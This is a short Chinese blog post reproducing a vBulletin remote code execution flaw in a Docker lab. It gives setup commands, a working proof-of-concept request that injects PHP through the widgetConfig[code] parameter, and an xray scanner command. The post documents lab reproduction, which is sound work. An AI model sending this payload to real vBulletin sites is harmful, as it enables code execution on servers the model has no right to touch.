你可以在以下渠道联系到我,转载请注明文章来源地址~
中文id:闪光
知乎:Sp4rkW
GITHUB:Sp4rkW
B站:一只技术君
博客:https://sp4rkw.blog.csdn.net/
联系邮箱:[email protected]
github看到某大佬的演示,还以为是0day,后来发现是去年的洞,不过都复现完成了,就记录写个博客吧
环境搭建
直接拖个docker
docker run -ti -p 80:80 --name vbulletin -d p8361/vbulletin-cve-2015-7808
之后进去改个配置
docker exec -it 517 /bin/bash
# update然后装vim
apt-get update
apt install vim
# 改配置
vim /etc/apache2/apache2.conf
# 最下面补这个配置
ServerName localhost:80
# 给根目录下run.sh权限并启动
chmod +x ./run.sh
./run.sh
poc验证
/ajax/render/widget_tabbedcontainer_tab_panel
routestring=ajax%2Frender%2Fwidget_php&widgetConfig[code]=phpinfo();exit;
xray扫描
.\xray_windows_amd64.exe webscan --plugins phantasm --poc ".\poc\vbulletin-cve-2019-16759.yml" --url http://192.168.1.109/ --html-output test1.html